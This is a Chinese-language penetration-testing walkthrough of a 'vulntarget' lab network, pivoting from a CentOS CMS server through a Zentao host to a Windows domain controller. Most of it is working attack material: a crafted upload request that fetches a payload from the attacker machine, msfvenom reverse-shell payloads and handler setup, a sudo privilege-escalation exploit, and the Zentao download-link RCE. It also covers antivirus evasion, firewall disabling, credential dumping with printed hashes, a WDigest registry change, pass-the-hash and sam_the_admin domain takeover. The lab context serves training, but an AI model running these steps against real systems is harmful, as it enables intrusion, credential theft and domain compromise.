0x00 环境搭建
https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ
网络拓扑图
0x01 Centos7
1.1 信息搜集
fscan扫一波
./fscan -h 192.168.239.111
fscan将ssh密码扫出来.......还是走正常流程打,访问公网IP1回显是宝塔的页面,8888,888一顿测试没发现什么功能点先放这
1.2 漏洞利用
81端口访问是极致cms,有文件上传漏洞的0day,访问/admin.php/Plugins/update.html访问要登录
随便测几个弱口令没成功对登录框进行抓包测试,验证码4位准备ddddocr与burp的插件联动爆破,突然发现验证码复用就省了这步,直接爆破出账号与密码为admin\admin123
抓一个/admin.php/Plugins/update.html
将paylaod放进去kali起个http服务,将a.php压缩为1.zip,密码为1
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.239.111:81
Content-Length: 87
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.239.111:81
Referer: http://192.168.239.111:81/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8bp7i3n8mdl3o0jhf9vq2tjq5c
Connection: close
action=start-download&filepath=dbrestore&download_url=http://192.168.239.130:8000/1.zip
在发一个包将服务器存储1.zip文件的size拿到
在发包请求解压1.zip,访问A/exts/a.php
出现phpinfo攻击成功,蚁剑连接
思路是:生成一个linux反向马放到/tmp/
msf开启监听拿到shell,
意外蚁剑执行命令没有成功,估计是开启disable_function
1.3 蚁剑插件绕过disable_functions
准备ip a/ifconfig
查看网络信息时发现执行没有结果,这些命令没安装,这里介绍三种方法:
-
hostname -I
-
直接查看网卡文件带
.ens
cd /etc/sysconfig/network-scripts/ ls |grep ens cat ifcig-ens33 cat ifcig-ens77
-
/sbin/ifconfig
uname -a
看操作系统及位数生成payload,### 1.4 msf监听上线Linux localhost.localdomain 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
生成反向shell放入/tmp目录注意shell.elf在tmp目录要加执行权限 chmod +x shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.239.130 LPORT=4444 -f elf > shell.elf msfconsole use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost 192.168.239.130 #默认端口跟shell反弹端口一致不用修改 set autorunscript migrate -n explorer.exe #自动将进程迁移至explorer下 set ExitOnSession false #进程断了也保持监听 exploit -j -z #-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
自动添加路由run post/multi/manage/autoroute run autoroute -p arp -a
发现10.0.20.0网段,在shell执行命令时发现shell只能按shift+enter才能执行命令,切换交互式shell,有python环境,执行python -c 'import pty; pty.spawn("/bin/bash")'
没有python可以用/usr/bin/script -qc /bin/bash /dev/null#切换为bash
getlwd #显示攻击机目录,
lcd ./Desktop/tools #切换目录到tools
upload ./fscan /tmp/
chmod +x ./fscan #加执行权限
./fscan -h 10.0.20.0/24
这里fscan扫描的时候发现没有回显结果,执行fscan有时间间隔猜测执行了命令,只是结果没回显过来将结果写到一个文件里面成功解决
./fscan -h 10.0.20.1/24 > 1.txt
因为权限问题不能对外发ping包没有检测到其他主机,要提权先使用msf自带模块进行尝试
- 检测能用的exp
use post/multi/recon/local_exploit_suggester set session 5 run
- 使用
linux/local/sudo_baron_samedit
进行基于sudo的提权攻击虽然没有弹回shell,但是生成了具有root权限的msf账户use exploit linux/local/sudo_baron_samedit options set lport 5555#新的监听端口 set target 12 run
使用msf\akeifiiymuaauvf
进行ssh连接运行之前传过来的shell.elf成功弹回root权限的shellssh msf@192.168.239.111# akeifiiymuaauvf
终于提权成功,进行一波信息搜集为什么不使用nmap与fscan在总结时说明use auxiliary/scanner/portscan/tcp set rhost 10.0.20.0/24 set ports 21,22,80,445,1433,3389,6379,8080,1521 run
发现10.0.20.66:8080为了方便工具利用将其出来8080端口转发出来,这里4dnat将内网10.0.20.66的8080端口转发到centos的7777端口,将4dnat上传到centos7的tmp
目录执行## 0x02 win10upload ./tools/4dnat_linux/4dnat /tmp/ chmod +x ./4dnat ./4dnat -forward 7777 10.0.20.66:8080 #将远程的8080绑定到本地的7777
### 2.1 禅道CNVD-2020-121325
访问192.168.239.111:7777,禅道cms看源码发现测试源码留下的密码............
点击链接直接登录成功
发现是禅道cms12.4.2版本,有# CNVD-2020-121325文件上传漏洞利用,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。
- 在centos7传一个1.php马这里显示需要admin权限
python -m SimpleHTTPServer #在centos起http服务内网20.66可以访问下载 HTTP://10.0.20.30:8000/1.php # ip要内网ip, base64编码为SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==
使用admin/Admin123
登录成功#社工拿到http://192.168.239.111:7777/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==
访问http://192.168.239.111:7777/data/client/1/1.php
利用成功
信息收集一波
# 域: vulntarget.com
# 域控主机:WIN-UH20PRD3EAO
# 域控IP: 10.0.10.100
ipconfig /all
net group /domain
ping WIN-UH20PRD3EAO.vulntarget.com
发现域控与win10在同一段下,思路正向马连接win10在横向域控
上传木马成功但是在目录没有这个文件,怀疑安装杀软,将进程放到https://tasklist.pdsec.top/
识别,安装了火绒
2.2 免杀过火绒
使用掩日的免杀工具进行免杀,成功免杀火绒
msfvenom -p windows/x64/meterpreter/bind_tcp lport=11001 -f exe >rw10.exe
正向shell连不上,怀疑是防火墙的原因,使用netsh关闭防火墙权限不足,生成反向马进行连接
#关闭win7防火墙
netsh firewall set opmode mode = disable
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=11001 -f exe >rw10.exe
免杀后成功上线
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.30 #centos7的地址
#设置端口号
set lport 11001
#开启监听
#设置自动迁移进程,这样在进程里面就找不到shell的进程了,将进程迁移到桌面进程里面
set autorunscript migrate -n explorer.exe
set ExitOnSession false
#让connection保持连接(即使一个连接退出,仍然保持listening状态)
run -j -z
#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
run
添加自动路由
run post/multi/manage/autoroute
arp -a
当前为IIS APPPOOL\zentao用户权限低,进行提权
getsystem
上fscan扫一波域控没什么服务域控IP10.0.10.100
0x03 win2016 server
有MS17-010漏洞先直接打一波,使用msf自带ms17-010模块
search ms17-010
use 0
set rhost 10.0.10.100 #目标ip
set lhost 10.0.10.99 #win10
run
利用失败,尝试抓密码hash抓到win101NTML hash
hashdump
load kiwi
creds_all
#Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
#WIN10$ VULNTARGET 9d28b804217066ded1050aebe745d407 b6aa5d021dbd182457736e1d4be18a6a4e9995d9
#win101 VULNTARGET 282d975e35846022476068ab5a3d72df bc9ecca8d006d8152bd51db558221a0540c9d604 8d6103509e746ac0ed9641f7c21d7cf7
在somd5解密win101的NTML hash拿到 win101/admin#123
3.1 修改注册表抓明文密码
也可以使用修改注册表来抓明文密码,修改后需要win10重新登录,或注销
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
3.2 PTH
使用psexec与wmiexec,进行pth均未成功
proxychains python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 ./Administrator@10.0.10.100
proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 Administrator@10.0.10.100
3.2 CVE-2021-42287横向移动
CVE-2021-42287原理:
Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。
use server/socks_tcp
run
proxychains4 python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell
0x04 总结问题
- 使用fscan与nmap没扫出win10这个主机
-Pn -np
都试过不行,不知道为什么?? - 拿到域控win2016后想上传马到域控将shell转到msf里面没成功,win10没有python环境,使用netsh将win10的8000端口转发给centos的8000,在将centos的8000端口转发到kali的8000端口
win2016-->win10:8000-->centos:8000-->kali:8000
在kali:8000端口开启http服务,没成功shell还断开了